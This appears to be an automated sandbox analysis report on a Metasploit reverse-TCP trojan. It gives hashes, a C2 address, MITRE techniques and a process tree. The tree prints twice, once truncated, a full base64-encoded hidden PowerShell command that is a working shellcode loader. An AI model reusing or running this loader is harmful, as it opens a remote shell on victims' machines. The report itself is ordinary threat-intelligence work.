metasploit | ac40d0faab088c5c6025608bee2a19e7ca6434d375ba641d25c58dc365cef118

General

Target

ac40d0faab088c5c6025608bee2a19e7ca6434d375ba641d25c58dc365cef118.exe
Size

457KB
MD5

92d6ba61a7abad1157873743d8c99ff0
SHA1

7147f50c341b1d51a0454db30c67d75368541c4d
SHA256

ac40d0faab088c5c6025608bee2a19e7ca6434d375ba641d25c58dc365cef118
SHA512

b0ef35271d78f34575be5b3aeecfe3698214ac7232b5e22a07edc7cc12073f0754635568e82db8508f9c57c4a846ff9db1bf18a2b1c2bba34343735b05427afe
SSDEEP

6144:8SrEWDl7s5t38dX6pKE4dU7kpoTcnFOHuln+Otc+EkzI8jSejCE8aKP3sGvL4hcJ:8SgbP/GFK9Akld9g/+OuV8IRCw

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

192.168.1.36:6060

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1692	powershell.exe
1772	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	ac40d0faab088c5c6025608bee2a19e7ca6434d375ba641d25c58dc365cef118.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ac40d0faab088c5c6025608bee2a19e7ca6434d375ba641d25c58dc365cef118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1692	powershell.exe
1692	powershell.exe
1772	powershell.exe
1772	powershell.exe
2408	powershell.exe
2408	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1692	powershell.exe
Token: SeDebugPrivilege	1772	powershell.exe
Token: SeDebugPrivilege	2408	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 336 wrote to memory of 1692	336	ac40d0faab088c5c6025608bee2a19e7ca6434d375ba641d25c58dc365cef118.exe	82
PID 336 wrote to memory of 1692	336	ac40d0faab088c5c6025608bee2a19e7ca6434d375ba641d25c58dc365cef118.exe	82
PID 336 wrote to memory of 1692	336	ac40d0faab088c5c6025608bee2a19e7ca6434d375ba641d25c58dc365cef118.exe	82
PID 1692 wrote to memory of 1772	1692	powershell.exe	84
PID 1692 wrote to memory of 1772	1692	powershell.exe	84
PID 1692 wrote to memory of 1772	1692	powershell.exe	84
PID 1772 wrote to memory of 2408	1772	powershell.exe	87
PID 1772 wrote to memory of 2408	1772	powershell.exe	87
PID 1772 wrote to memory of 2408	1772	powershell.exe	87
PID 2408 wrote to memory of 1860	2408	powershell.exe	90
PID 2408 wrote to memory of 1860	2408	powershell.exe	90
PID 2408 wrote to memory of 1860	2408	powershell.exe	90
PID 1860 wrote to memory of 1732	1860	csc.exe	91
PID 1860 wrote to memory of 1732	1860	csc.exe	91
PID 1860 wrote to memory of 1732	1860	csc.exe	91

C:\Users\Admin\AppData\Local\Temp\ac40d0faab088c5c6025608bee2a19e7ca6434d375ba641d25c58dc365cef118.exe
"C:\Users\Admin\AppData\Local\Temp\ac40d0faab088c5c6025608bee2a19e7ca6434d375ba641d25c58dc365cef118.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:336
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand JABxAHEAagBnACAAPQAgACcAJABYAEoARABNACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFgASgBEAE0AIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZAA5ACwAMAB4AGUAOQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgAYgBmACwAMAB4AGYANwAsADAAeAA0AGQALAAwAHgAOQBmACwAMAB4ADYAZQAsADAAeAA1AGEALAAwAHgAMwAzACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADMAMQAsADAAeAA3AGEALAAwAHgAMQBhACwAMAB4ADgAMwAsADAAeABlAGEALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeAA3AGEALAAwAHgAMQA2ACwAMAB4AGUAMgAsADAAeAAwADIALAAwAHgAYgAxACwAMAB4ADcANwAsADAAeABlAGMALAAwAHgAZQBjACwAMAB4ADQAYQAsADAAeAA4ADgALAAwAHgAOQAxACwAMAB4ADYANQAsADAAeABhAGYALAAwAHgAYgA5ACwAMAB4ADkAMQAsADAAeAAxADEALAAwAHgAYgBiACwAMAB4AGUAYQAsADAAeAAyADEALAAwAHgANQAyACwAMAB4AGUAOQAsADAAeAAwADYALAAwAHgAYwA5ACwAMAB4ADMANgAsADAAeAAxAGEALAAwAHgAOQBjACwAMAB4AGIAZgAsADAAeAA5AGUALAAwAHgAMgBkACwAMAB4ADEANQAsADAAeAA3ADUALAAwAHgAZgA4ACwAMAB4ADAAMAAsADAAeABhADYALAAwAHgAMgA2ACwAMAB4ADMAOAAsADAAeAAwADIALAAwAHgAMgA0ACwAMAB4ADMANQAsADAAeAA2AGMALAAwAHgAZQA0ACwAMAB4ADEANQAsADAAeABmADYALAAwAHgANgAxACwAMAB4AGUANQAsADAAeAA1ADIALAAwAHgAZQBiACwAMAB4ADgAYgAsADAAeABiADcALAAwAHgAMABiACwAMAB4ADYANwAsADAAeAAzADkALAAwAHgAMgA4ACwAMAB4ADMAZgAsADAAeAAzAGQALAAwAHgAOAAxACwAMAB4AGMAMwAsADAAeAA3ADMALAAwAHgAZAAzACwAMAB4ADgAMQAsADAAeAAzADAALAAwAHgAYwAzACwAMAB4AGQAMgAsADAAeABhADAALAAwAHgAZQA2ACwAMAB4ADUAZgAsADAAeAA4AGQALAAwAHgANgAyACwAMAB4ADAAOAAsADAAeABiADMALAAwAHgAYQA1ACwAMAB4ADIAYgAsADAAeAAxADIALAAwAHgAZAAwACwAMAB4ADgAMAAsADAAeABlADIALAAwAHgAYQA5ACwAMAB4ADIAMgAsADAAeAA3AGUALAAwAHgAZgA1ACwAMAB4ADcAYgAsADAAeAA3AGIALAAwAHgANwBmACwAMAB4ADUAOQAsADAAeAA0ADIALAAwAHgAYgAzACwAMAB4ADcAMgAsADAAeABhADAALAAwAHgAOAAyACwAMAB4ADcANAAsADAAeAA2AGQALAAwAHgAZAA3ACwAMAB4AGYAYQAsADAAeAA4ADYALAAwAHgAMQAwACwAMAB4AGUAZgAsADAAeAAzADgALAAwAHgAZgA0ACwAMAB4AGMAZQAsADAAeAA3AGEALAAwAHgAZABiACwAMAB4ADUAZQAsADAAeAA4ADQALAAwAHgAZABjACwAMAB4ADAANwAsADAAeAA1AGUALAAwAHgANAA5ACwAMAB4AGIAYQAsADAAeABjAGMALAAwAHgANgBjACwAMAB4ADIANgAsADAAeABjADkALAAwAHgAOABiACwAMAB4ADcAMAAsADAAeABiADkALAAwAHgAMQBlACwAMAB4AGEAMAAsADAAeAA4AGQALAAwAHgAMwAyACwAMAB4AGEAMQAsADAAeAA2ADcALAAwAHgAMAA0ACwAMAB4ADAAMAAsADAAeAA4ADUALAAwAHgAYQAzACwAMAB4ADQAYwAsADAAeABkADIALAAwAHgAYQA0ACwAMAB4AGYAMgAsADAAeAAyADgALAAwAHgAYgA1ACwAMAB4AGQAOQAsADAAeABlADUALAAwAHgAOQAyACwAMAB4ADYAYQAsADAAeAA3AGYALAAwAHgANgBkACwAMAB4ADMAZQAsADAAeAA3AGUALAAwAHgAZgAyACwAMAB4ADIAYwAsADAAeAA1ADcALAAwAHgAYgAzACwAMAB4ADMAZQAsADAAeABjAGYALAAwAHgAYQA3ACwAMAB4AGQAYgAsADAAeAA0ADkALAAwAHgAYgBjACwAMAB4ADkANQAsADAAeAA0ADQALAAwAHgAZQAxACwAMAB4ADIAYQAsADAAeAA5ADYALAAwAHgAMABkACwAMAB4ADIAZgAsADAAeABhAGMALAAwAHgAYQBmACwAMAB4ADEAYQAsADAAeABkADAALAAwAHgANgAyACwAMAB4ADEANwAsADAAeAA0AGEALAAwAHgAMgBmACwAMAB4ADgAMwAsADAAeAA2ADgALAAwAHgANAAyACwAMAB4AGUAYgAsADAAeABkADcALAAwAHgAMwA4ACwAMAB4AGYAYwAsADAAeABkAGEALAAwAHgANQA3ACwAMAB4AGQAMwAsADAAeABmAGMALAAwAHgAZQAzACwAMAB4ADgAZAAsADAAeAA0AGUALAAwAHgAZgA3ACwAMAB4ADcAMwAsADAAeABlAGUALAAwAHgAMgA3ACwAMAB4ADAANgAsADAAeABhADcALAAwAHgAOAA2ACwAMAB4ADMANQAsADAAeAAwADkALAAwAHgAYgAwACwAMAB4AGYAYQAsADAAeABiADMALAAwAHgAZQBmACwAMAB4AGUAZQAsADAAeAA1ADIALAAwAHgAOQA0ACwAMAB4AGIAZgAsADAAeAA0AGUALAAwAHgAMAAzACwAMAB4ADUANAAsADAAeAAxADAALAAwAHgAMgA2ACwAMAB4ADQAOQAsADAAeAA1AGIALAAwAHgANABmACwAMAB4ADUANgAsADAAeAA3ADIALAAwAHgAYgAxACwAMAB4AGYAOAAsADAAeABmAGMALAAwAHgAOQBkACwAMAB4ADYAYwAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4ADAANwAsADAAeAAzADUALAAwAHgAMgBhACwAMAB4ADAAOQAsADAAeABjADgALAAwAHgAZQAzACwAMAB4ADUANgAsADAAeAAwADkALAAwAHgANAAyACwAMAB4ADAAMAAsADAAeABhADYALAAwAHgAYwA3ACwAMAB4AGEAMwAsADAAeAA2AGQALAAwAHgAYgA0ACwAMAB4AGIAZgAsADAAeAA0ADMALAAwAHgAMwA4ACwAMAB4AGUANgAsADAAeAA2ADkALAAwAHgANQBiACwAMAB4ADkANgAsADAAeAA4AGQALAAwAHgAOQA1ACwAMAB4AGMAOQAsADAAeAAxAGQALAAwAHgAMAA0ACwAMAB4AGMAMgAsADAAeAA2ADUALAAwAHgAMQBjACwAMAB4ADcAMQAsADAAeAAyADQALAAwAHgAMgBhACwAMAB4AGQAZgAsADAAeAA1ADQALAAwAHgAMwBmACwAMAB4AGUAMwAsADAAeAA3ADUALAAwAHgAMQA3ACwAMAB4ADUANwAsADAAeAAwAGMALAAwAHgAOQBhACwAMAB4ADkANwAsADAAeABhADcALAAwAHgANQBhACwAMAB4AGYAMAAsADAAeAA5ADcALAAwAHgAYwBmACwAMAB4ADMAYQAsADAAeABhADAALAAwAHgAYwBiACwAMAB4AGUAYQAsADAAeAA0ADQALAAwAHgANwBkACwAMAB4ADcAOAAsADAAeABhADcALAAwAHgAZAAwACwAMAB4ADcAZQAsADAAeAAyADkALAAwAHgAMQA0ACwAMAB4ADcAMgAsADAAeAAxADcALAAwAHgAZAA3ACwAMAB4ADQAMwAsADAAeABiADQALAAwAHgAYgA4ACwAMAB4ADIAOAAsADAAeABhADYALAAwAHgANAA0ACwAMAB4ADgANAAsADAAeABmAGUALAAwAHgAOABlACwAMAB4ADMAMgAsADAAeABlADQALAAwAHgAYwAyADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABaAHAAWQA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAWgBwAFkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFoAcABZACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcQBxAGoAZwApACkAOwAkAHMAdgBQAGwAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJAByADAAeABWACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAHIAMAB4AFYAIAAkAHMAdgBQAGwAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAcwB2AFAAbAAgACQAZQAiADsAfQA=
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1692
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand JABxAHEAagBnACAAPQAgACcAJABYAEoARABNACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFgASgBEAE0AIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZAA5ACwAMAB4AGUAOQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgAYgBmACwAMAB4AGYANwAsADAAeAA0AGQALAAwAHgAOQBmACwAMAB4ADYAZQAsADAAeAA1AGEALAAwAHgAMwAzACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADMAMQAsADAAeAA3AGEALAAwAHgAMQBhACwAMAB4ADgAMwAsADAAeABlAGEALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeAA3AGEALAAwAHgAMQA2ACwAMAB4AGUAMgAsADAAeAAwADIALAAwAHgAYgAxACwAMAB4ADcANwAsADAAeABlAGMALAAwAHgAZQBjACwAMAB4ADQAYQAsADAAeAA4ADgALAAwAHgAOQAxACwAMAB4ADYANQAsADAAeABhAGYALAAwAHgAYgA5ACwAMAB4ADkAMQAsADAAeAAxADEALAAwAHgAYgBiACwAMAB4AGUAYQAsADAAeAAyADEALAAwAHgANQAyACwAMAB4AGUAOQAsADAAeAAwADYALAAwAHgAYwA5ACwAMAB4ADMANgAsADAAeAAxAGEALAAwAHgAOQBjACwAMAB4AGIAZgAsADAAeAA5AGUALAAwAHgAMgBkACwAMAB4ADEANQAsADAAeAA3ADUALAAwAHgAZgA4ACwAMAB4ADAAMAAsADAAeABhADYALAAwAHgAMgA2ACwAMAB4ADMAOAAsADAAeAAwADIALAAwAHgAMgA0ACwAMAB4ADMANQAsADAAeAA2AGMALAAwAHgAZQA0ACwAMAB4ADEANQAsADAAeABmADYALAAwAHgANgAxACwAMAB4AGUANQAsADAAeAA1ADIALAAwAHgAZQBiACwAMAB4ADgAYgAsADAAeABiADcALAAwAHgAMABiACwAMAB4ADYANwAsADAAeAAzADkALAAwAHgAMgA4ACwAMAB4ADMAZgAsADAAeAAzAGQALAAwAHgAOAAxACwAMAB4AGMAMwAsADAAeAA3ADMALAAwAHgAZAAzACwAMAB4ADgAMQAsADAAeAAzADAALAAwAHgAYwAzACwAMAB4AGQAMgAsADAAeABhADAALAAwAHgAZQA2ACwAMAB4ADUAZgAsADAAeAA4AGQALAAwAHgANgAyACwAMAB4ADAAOAAsADAAeABiADMALAAwAHgAYQA1ACwAMAB4ADIAYgAsADAAeAAxADIALAAwAHgAZAAwACwAMAB4ADgAMAAsADAAeABlADIALAAwAHgAYQA5ACwAMAB4ADIAMgAsADAAeAA3AGUALAAwAHgAZgA1ACwAMAB4ADcAYgAsADAAeAA3AGIALAAwAHgANwBmACwAMAB4ADUAOQAsADAAeAA0ADIALAAwAHgAYgAzACwAMAB4ADcAMgAsADAAeABhADAALAAwAHgAOAAyACwAMAB4ADcANAAsADAAeAA2AGQALAAwAHgAZAA3ACwAMAB4AGYAYQAsADAAeAA4ADYALAAwAHgAMQAwACwAMAB4AGUAZgAsADAAeAAzADgALAAwAHgAZgA0ACwAMAB4AGMAZQAsADAAeAA3AGEALAAwAHgAZABiACwAMAB4ADUAZQAsADAAeAA4ADQALAAwAHgAZABjACwAMAB4ADAANwAsADAAeAA1AGUALAAwAHgANAA5ACwAMAB4AGIAYQAsADAAeABjAGMALAAwAHgANgBjACwAMAB4ADIANgAsADAAeABjADkALAAwAHgAOABiACwAMAB4ADcAMAAsADAAeABiADkALAAwAHgAMQBlACwAMAB4AGEAMAAsADAAeAA4AGQALAAwAHgAMwAyACwAMAB4AGEAMQAsADAAeAA2ADcALAAwAHgAMAA0ACwAMAB4ADAAMAAsADAAeAA4ADUALAAwAHgAYQAzACwAMAB4ADQAYwAsADAAeABkADIALAAwAHgAYQA0ACwAMAB4AGYAMgAsADAAeAAyADgALAAwAHgAYgA1ACwAMAB4AGQAOQAsADAAeABlADUALAAwAHgAOQAyACwAMAB4ADYAYQAsADAAeAA3AGYALAAwAHgANgBkACwAMAB4ADMAZQAsADAAeAA3AGUALAAwAHgAZgAyACwAMAB4ADIAYwAsADAAeAA1ADcALAAwAHgAYgAzACwAMAB4ADMAZQAsADAAeABjAGYALAAwAHgAYQA3ACwAMAB4AGQAYgAsADAAeAA0ADkALAAwAHgAYgBjACwAMAB4ADkANQAsADAAeAA0ADQALAAwAHgAZQAxACwAMAB4ADIAYQAsADAAeAA5ADYALAAwAHgAMABkACwAMAB4ADIAZgAsADAAeABhAGMALAAwAHgAYQBmACwAMAB4ADEAYQAsADAAeABkADAALAAwAHgANgAyACwAMAB4ADEANwAsADAAeAA0AGEALAAwAHgAMgBmACwAMAB4ADgAMwAsADAAeAA2ADgALAAwAHgANAAyACwAMAB4AGUAYgAsADAAeABkADcALAAwAHgAMwA4ACwAMAB4AGYAYwAsADAAeABkAGEALAAwAHgANQA3ACwAMAB4AGQAMwAsADAAeABmAGMALAAwAHgAZQAzACwAMAB4ADgAZAAsADAAeAA0AGUALAAwAHgAZgA3ACwAMAB4ADcAMwAsADAAeABlAGUALAAwAHgAMgA3ACwAMAB4ADAANgAsADAAeABhADcALAAwAHgAOAA2ACwAMAB4ADMANQAsADAAeAAwADkALAAwAHgAYgAwACwAMAB4AGYAYQAsADAAeABiADMALAAwAHgAZQBmACwAMAB4AGUAZQAsADAAeAA1ADIALAAwAHgAOQA0ACwAMAB4AGIAZgAsADAAeAA0AGUALAAwAHgAMAAzACwAMAB4ADUANAAsADAAeAAxADAALAAwAHgAMgA2ACwAMAB4ADQAOQAsADAAeAA1AGIALAAwAHgANABmACwAMAB4ADUANgAsADAAeAA3ADIALAAwAHgAYgAxACwAMAB4AGYAOAAsADAAeABmAGMALAAwAHgAOQBkACwAMAB4ADYAYwAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4ADAANwAsADAAeAAzADUALAAwAHgAMgBhACwAMAB4ADAAOQAsADAAeABjADgALAAwAHgAZQAzACwAMAB4ADUANgAsADAAeAAwADkALAAwAHgANAAyACwAMAB4ADAAMAAsADAAeABhADYALAAwAHgAYwA3ACwAMAB4AGEAMwAsADAAeAA2AGQALAAwAHgAYgA0ACwAMAB4AGIAZgAsADAAeAA0ADMALAAwAHgAMwA4ACwAMAB4AGUANgAsADAAeAA2ADkALAAwAHgANQBiACwAMAB4ADkANgAsADAAeAA4AGQALAAwAHgAOQA1ACwAMAB4AGMAOQAsADAAeAAxAGQALAAwAHgAMAA0ACwAMAB4AGMAMgAsADAAeAA2ADUALAAwAHgAMQBjACwAMAB4ADcAMQAsADAAeAAyADQALAAwAHgAMgBhACwAMAB4AGQAZgAsADAAeAA1ADQALAAwAHgAMwBmACwAMAB4AGUAMwAsADAAeAA3ADUALAAwAHgAMQA3ACwAMAB4ADUANwAsADAAeAAwAGMALAAwAHgAOQBhACwAMAB4ADkANwAsADAAeABhADcALAAwAHgANQBhACwAMAB4AGYAMAAsADAAeAA5ADcALAAwAHgAYwBmACwAMAB4ADMAYQAsADAAeABhADAALAAwAHgAYwBiACwAMAB4AGUAYQAsADAAeAA0ADQALAAwAHgANwBkACwAMAB4ADcAOAAsADAAeABhADcALAAwAHgAZAAwACwAMAB4ADcAZQAsADAAeAAyADkALAAwAHgAMQA0ACwAMAB4ADcAMgAsADAAeAAxADcALAAwAHgAZAA3ACwAMAB4ADQAMwAsADAAeABiADQALAAwAHgAYgA4ACwAMAB4ADIAOAAsADAAeABhADYALAAwAHgANAA0ACwAMAB4ADgANAAsADAAeABmAGUALAAwAHgAOABlACwAMAB4ADMAMgAsADAAeABlADQALAAwAHgAYwAyADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABaAHAAWQA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAWgBwAFkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFoAcABZACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcQBxAGoAZwApACkAOwAkAHMAdgBQAGwAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQ